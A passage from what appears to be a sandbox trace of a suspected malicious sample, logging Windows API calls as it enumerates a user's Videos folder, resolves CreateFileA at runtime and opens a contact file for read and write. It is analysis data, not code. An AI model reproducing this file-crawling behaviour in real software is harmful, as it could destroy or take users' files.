ftLastAccessTime.dwLowDateTime=0x637dab90, ftLastAccessTime.dwHighDateTime=0x1d5c2e4, ftLastWriteTime.dwLowDateTime=0x637dab90, ftLastWriteTime.dwHighDateTime=0x1d5c2e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2200 [0029.161] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6d2b20, ftCreationTime.dwHighDateTime=0x1d5be32, ftLastAccessTime.dwLowDateTime=0x637dab90, ftLastAccessTime.dwHighDateTime=0x1d5c2e4, ftLastWriteTime.dwLowDateTime=0x637dab90, ftLastWriteTime.dwHighDateTime=0x1d5c2e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.161] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1996c6b0, ftCreationTime.dwHighDateTime=0x1d5b9f7, ftLastAccessTime.dwLowDateTime=0x44757480, ftLastAccessTime.dwHighDateTime=0x1d5c4c4, ftLastWriteTime.dwLowDateTime=0x44757480, ftLastWriteTime.dwHighDateTime=0x1d5c4c4, nFileSizeHigh=0x0, nFileSizeLow=0x6757, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="-23ZP4gcOG gf3iWX.flv", cAlternateFileName="-23ZP4~1.FLV")) returned 1 [0029.161] FindClose (in: hFindFile=0x7c2200 | out: hFindFile=0x7c2200) returned 1 [0029.161] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_mHpWJR_Yl93 b", cchCount1=14, lpString2="AppData", cchCount2=7) returned 1 [0029.161] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.161] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\*", lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x628b3ba0, ftCreationTime.dwHighDateTime=0x1d5c55d, ftLastAccessTime.dwLowDateTime=0x716871e0, ftLastAccessTime.dwHighDateTime=0x1d5be02, ftLastWriteTime.dwLowDateTime=0x716871e0, ftLastWriteTime.dwHighDateTime=0x1d5be02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2200 [0029.161] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x628b3ba0, ftCreationTime.dwHighDateTime=0x1d5c55d, ftLastAccessTime.dwLowDateTime=0x716871e0, ftLastAccessTime.dwHighDateTime=0x1d5be02, ftLastWriteTime.dwLowDateTime=0x716871e0, ftLastWriteTime.dwHighDateTime=0x1d5be02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.161] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7389b590, ftCreationTime.dwHighDateTime=0x1d5bd91, ftLastAccessTime.dwLowDateTime=0x65634260, ftLastAccessTime.dwHighDateTime=0x1d5b6d9, ftLastWriteTime.dwLowDateTime=0x65634260, ftLastWriteTime.dwHighDateTime=0x1d5b6d9, nFileSizeHigh=0x0, nFileSizeLow=0x10898, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="23efG7fei5t7RrlH_.avi", cAlternateFileName="23EFG7~1.AVI")) returned 1 [0029.161] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.161] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\*", lpFindFileData=0x6addd8 | out: lpFindFileData=0x6addd8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb5af6f0, ftCreationTime.dwHighDateTime=0x1d5ba1a, ftLastAccessTime.dwLowDateTime=0x415aa9c0, ftLastAccessTime.dwHighDateTime=0x1d5c431, ftLastWriteTime.dwLowDateTime=0x415aa9c0, ftLastWriteTime.dwHighDateTime=0x1d5c431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c22c0 [0029.162] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addd8 | out: lpFindFileData=0x6addd8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb5af6f0, ftCreationTime.dwHighDateTime=0x1d5ba1a, ftLastAccessTime.dwLowDateTime=0x415aa9c0, ftLastAccessTime.dwHighDateTime=0x1d5c431, ftLastWriteTime.dwLowDateTime=0x415aa9c0, ftLastWriteTime.dwHighDateTime=0x1d5c431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.162] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addd8 | out: lpFindFileData=0x6addd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b738d40, ftCreationTime.dwHighDateTime=0x1d5c26c, ftLastAccessTime.dwLowDateTime=0xf00cb540, ftLastAccessTime.dwHighDateTime=0x1d5bef4, ftLastWriteTime.dwLowDateTime=0xf00cb540, ftLastWriteTime.dwHighDateTime=0x1d5bef4, nFileSizeHigh=0x0, nFileSizeLow=0x1667f, dwReserved0=0x4, dwReserved1=0x777648, cFileName="02DcEZB-wigQKJ.mkv", cAlternateFileName="02DCEZ~1.MKV")) returned 1 [0029.162] FindClose (in: hFindFile=0x7c22c0 | out: hFindFile=0x7c22c0) returned 1 [0029.162] FindClose (in: hFindFile=0x7c2200 | out: hFindFile=0x7c2200) returned 1 [0029.162] FindClose (in: hFindFile=0x7c2140 | out: hFindFile=0x7c2140) returned 1 [0029.162] FindClose (in: hFindFile=0x7c2080 | out: hFindFile=0x7c2080) returned 1 [0029.162] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0029.163] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0029.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0029.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0029.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0029.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0029.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0029.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0029.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0029.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0029.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0029.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.165] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0029.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889a90 [0029.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889a90, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0029.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.165] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0029.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0029.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0029.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a90 [0029.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889a90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0029.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.166] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0029.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0029.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0029.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0029.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0029.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0029.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0029.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0029.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x88ffb0 [0029.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0029.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3f) returned 0x7ab260 [0029.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", cchWideChar=63, lpMultiByteStr=0x7ab260, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", lpUsedDefaultChar=0x0) returned 63 [0029.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0029.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0029.167] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0029.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0029.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0029.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0029.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0029.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0029.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0029.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=63, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0029.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7e) returned 0x7d5bb8 [0029.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=63, lpWideCharStr=0x7d5bb8, cchWideChar=63 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 63 [0029.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0029.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0029.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0029.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0029.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0029.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0029.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0029.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0029.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0029.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0029.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0029.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0029.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0029.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0029.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0029.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0029.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0029.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0029.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0029.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0029.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0029.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0029.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0029.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0029.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0029.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0029.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0029.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0029.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0029.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0029.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0029.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0029.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0029.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0029.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0029.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0029.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.171] FreeLibrary 